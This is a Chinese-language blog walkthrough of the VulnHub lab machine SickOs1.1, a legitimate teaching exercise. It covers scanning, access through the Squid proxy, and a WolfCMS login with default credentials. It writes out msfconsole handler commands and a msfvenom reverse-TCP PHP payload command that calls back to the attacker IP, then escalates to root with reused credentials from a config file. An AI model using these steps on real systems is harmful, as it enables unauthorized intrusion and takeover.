VulnHub靶机-SickOs1.1

最新推荐文章于 2024-09-28 14:50:24 发布
原创 最新推荐文章于 2024-09-28 14:50:24 发布 · 1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试

本文详细记录了针对VulnHub靶机SickOs1.1进行的信息搜集过程,包括使用nmap探测开放端口和通过WolfCMS CMS进行漏洞利用。通过文件上传getshell,然后使用msfvenom生成木马并监听,最终获取靶机的shell。在提权阶段,分析了WolfCMS的配置文件,成功以sickos用户登录并进一步提升权限到root,找到了隐藏的flag。整个过程展示了渗透测试的基本步骤和技术。

VulnHub靶机-SickOs1.1

下载地址:https://www.vulnhub.com/entry/sickos-11,132/
下载靶机后在VMware Workstation下打开,网卡配置为桥接
任务:提权并获取flag
攻击机:kali linux 192.168.8.195
靶机:192.168.8.194

文章目录

一、信息搜集

nmap探测存活主机,找到目标靶机
命令:nmap -sP 192.168.8.0/24
在这里插入图片描述

nmap扫描靶机开放的端口,得知开放了22、3128、8080端口,且提示需要代理3128端口才可以访问
命令:nmap -A -p- 192.168.8.194
在这里插入图片描述
代理192.168.8.194:3128
在这里插入图片描述
访问192.168.8.194,查看源代码没有发现有用信息
在这里插入图片描述
尝试访问robots.txt,可访问/wolfcms
在这里插入图片描述
访问http://192.168.8.194/wolfcms,woflcms是一款php编写的的轻量级cms程序。其后台入口是http://192.168.8.194/wolfcms/?/admin/login
在这里插入图片描述在这里插入图片描述
wolfcms的默认用户名和密码分别是admin和admin,尝试登陆,成功登录,并在页面内找到文件上传的位置
在这里插入图片描述

二、Getshell

这里选择文件上传getshell。方法是msfvenom生成木马,msfconsole监听,上传文件后,执行文件即可getshell

msfconsole监听,这里的lhost设置成攻击机的IP,lport随意设置一个监听端口
命令:
use exploit/multi/hadler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.8.195
set lport 4444
run
在这里插入图片描述
msfvenom生成一段shellcode,把shellcode复制到一个php文件里,这里复制到slow.php
命令:msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.8.195 lport=4444 -f raw
-p:选择一个payload
-f:输出格式,这里选择raw格式,raw是一个原生格式,里面只有数据
在这里插入图片描述
上传slow.php后访问public,执行slow.php
在这里插入图片描述
成功getshell
在这里插入图片描述

三、提权

python进入伪协议
在这里插入图片描述

查看wolfcms的配置文件config.php,在里面可以找到用户名和密码
在这里插入图片描述
登录root,但是登录失败,查看/etc/passwd,发现sickos,linux第一个添加的用户的默认id是1000,这个sickos是第一用户
在这里插入图片描述

尝试登陆sickos,成功登录
在这里插入图片描述

从sickos用户登录root
在这里插入图片描述成功登录后在/root目录下找到flag,至此已完成该靶机

Slow_
关注
VulnHub-SickOs1.1
江左盟的博客
07-07 1万+
信息收集 使用 漏洞发现 漏洞利用
Vulnhub靶机系列:SickOs: 1.1
汗的博客
04-19 1297
这次的靶机Vulnhub靶机靶机地址及相关描述 靶机设置 利用知识及工具 信息收集并getshell 提权 总结
红队打靶:SickOS1.1详细打靶思路(vulnhub
Bossfrank的博客
06-07 3437
本文是vulnhub靶机sickos详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。本文使用了squid代理分析+wolfcms渗透的思路获取shell。下一篇文章将详述利用shellshock漏洞进行渗透的思路。
vulhub——SickOs: 1.1
战神/calmness的博客
06-04 643
下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 目标机器地址:192.168.243.137 攻击机器地址:192.168.18.148 目录 信息收集 扫描 设置代理 wolfcms 上传木马 并且 访问 SSH登录 sudo提权 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubunt..
红队渗透靶场之SickOs1.1
xf555er的博客
12-06 1293
shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞, 攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令执行CGI 时会调用Bash将Referer、h
VulnHub-SickOs1.1靶机笔记
最新发布
LINGX5的博客
09-28 1331
通过nmap扫描发现了squid代理服务,设置代理做目录爆破发现了wolfcms,利用google搜索找到了它的后台管理页面,通过弱口令成功登陆进入后台管理页面利用后台的上传文件功能,上传php脚本成功获得了立足点,在该网站翻找配置信息,找了几组凭证,尝试口令服用,获得了sickos用户的权限,进而提权到了root。
红队笔记3-SickOS1.1打靶流程解法1-穿越Squid代理的CMS渗透(vulnhub
qq_63442530的博客
03-15 1556
1.端口扫描:发现存活端口:22 ,3128(squid-http) ,8080,其中squid-http是个代理服务器2.开始访问31288080都访问不到,目录扫描也扫描不出结果,根据我们知道squid是个代理服务器,尝试Dirb -p参数,挂代理目录爆破,成功扫出来一些路径。然后浏览器设置代理访问,找到了wolfcms的页面。3.通过浏览器获得wolfcms后台路径,通过弱口令登录后台,寻找后台代码执行和文件上传的位置,构造反弹命令写入代码执行,反弹shell。
VulnHub渗透测试实战靶场 - SICKOS: 1.1
LYJ20010728的博客
08-08 2193
VulnHub渗透测试实战靶场 - SICKOS: 1.1环境下载SICKOS: 1.1靶机搭建渗透测试信息搜集 环境下载 戳此进行环境下载 SICKOS: 1.1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l ...
Vulhub sickos1.1
hee_mee的博客
05-06 413
NilZero
OSCP Sickos 1.1 靶机渗透
Shadow的博客
03-23 415
Sickos 1.1 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-03-23 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 netdiscover -i eth0 Sickos 1.1主机ip为172.16.1.10 nmap 扫描一下 nmap -p- -A 172.16.1.10 主机开放了代理服务器,
Vulnhub系列:SickOS1.1
Ays.Ie的博客
03-05 514
继续更新vulnhub靶机,巩固渗透技术,分享做题思路,打开思维局限
Vulnhub靶机SickOs1.1渗透
xingjinhao123的博客
02-26 424
靶机介绍 官方下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 目标是获取root目录下的a0216ea4d51874464078c618298b1367.txt文件 发布日期是2015年11月 运行环境: 靶机:网络连接方式设为自动桥接,IP地址:192.168.1.76 攻击机:通网段下的kali linux,IP地址:192.168.1.44 开始渗透 运行靶机 获取靶机IP地址 扫描端口,没有发现熟悉的80端口 使用nikto简单扫一下312
「红队笔记」靶机精讲:SickOS1.1 - 穿越Squid代理的CMS渗透
m0_73612768的博客
11-29 1630
本文是作者在观看B站《红队笔记》后做的一些笔记以及相关知识的补充。靶机精讲之SickOS1.1vulnhub靶机,需要配置代理,穿越Squid实现对CMS渗透,完整的攻击链,对基本功要求比较高,不难,但也需要全局观和细节操作。能顺利完成本机渗透,也证明你在不断进步。此为方法一,本机还有全然不同的第二种打法。
Vulnhub靶机SICKOS_ 1.1
LainWith的博客
12-09 845
SickOs(此系列共2台)发布日期:2015年12月11日难度:初-中运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发现端口扫描+漏洞扫描代理扫描搜寻网站后台后台写入shell计划任务提权破壳漏洞拿shell。
SICKOS: 1.1(内含两种解法)
Mysmycbx的博客
03-18 908
但是通过阅读博客,没有啥信息,web上也不到默认用户和密码。扫3128,也扫不到任何东西,那就把3128做代理扫描80端口,扫描到几个文件,一一查看。发现可以编辑php代码,直接写入反弹shell,go。写入,保存,监听,访问,一气呵成。没扫到啥有用的信息,但是博客肯定有后台呀,这里没有搜到,去网上去搜搜。原来是定时执行connect.py文件,那就构造个反弹shell,写入文件中。通过阅读web目录下的文件,发现了数据库连接文件,发现到一个密码。通过搜索,发现3128端口是负责代理的。
红队靶机渗透-SickOS1.1
m0_57967573的博客
04-29 939
主机发现之后,分别用nmap的TCP和UDP扫描发现三个端口,8080存疑,未开放端口,3128是一个squid代理服务器,22 SSH端口 8080无法访问;3128提示报错信息,目录爆破也没有任何信息,由于它是代理服务器,因此以3128端口做代理进行目录扫描,得到了新的有价值web目录 通过在浏览器上把3128设置为代理服务器,访问到了靶机的web页面,看到了wolfcms内容管理系统······
No.12-VulnHub-SickOs: 1.1-Walkthrough渗透学习
qq_34801745的博客
01-10 3083
** VulnHub-SkyTower: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ 靶机难度:中级(CTF) 靶机发布日期:2015年12月11靶机描述:这个CTF明确地比喻了如何在网络上执行黑客策略,以在安全的环境中危害网络。 这个虚拟机与我在OSCP中遇到的实验室非常相似。 目的是破坏网络/计算机并...
SickOs1.1--靶机实操详解
qq_61802750的博客
08-05 616
所以我们要去找到它的管理员路径。这个系统没有做多少的自定义的功能,还是老旧的系统,我们可以通过:1.猜测;这样的话我们有理由去推测:整个系统就是administertor,所以我们能不能找到它的凭据,从而利用它的身份。这样我们就得到了一个root用户,但我们无法得出是22端口的ssh用户还是3128端口的用户。打开浏览器,对3128端口和8080端口进行访问,虽然说8080端口是关闭的,但我们还是要进行尝试。好了,我们看到了wolfcms的这么一个内容管理系统,那么在这个系统中,artcles中,有。
SickOs1.1
m0_66299232的博客
09-23 1477
其后台入口是http://192.168.166.129/wolfcms/?nmap -p- -A -T4 -sV 192.168.166.129 //探测目标靶机开放端口和相应服务情况。6.使用weevely连接木马,因为url需要代理才可以访问,这里需要现在环境变量中配置代理。上传成功,下一步用weevely来连接,连接的时候后面一定也要带cmd 这是密码。7.连接成功后在网站目录下发现config.php文件,发现数据库密码。cmd是密码 /root/weiqin.php 是路径。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值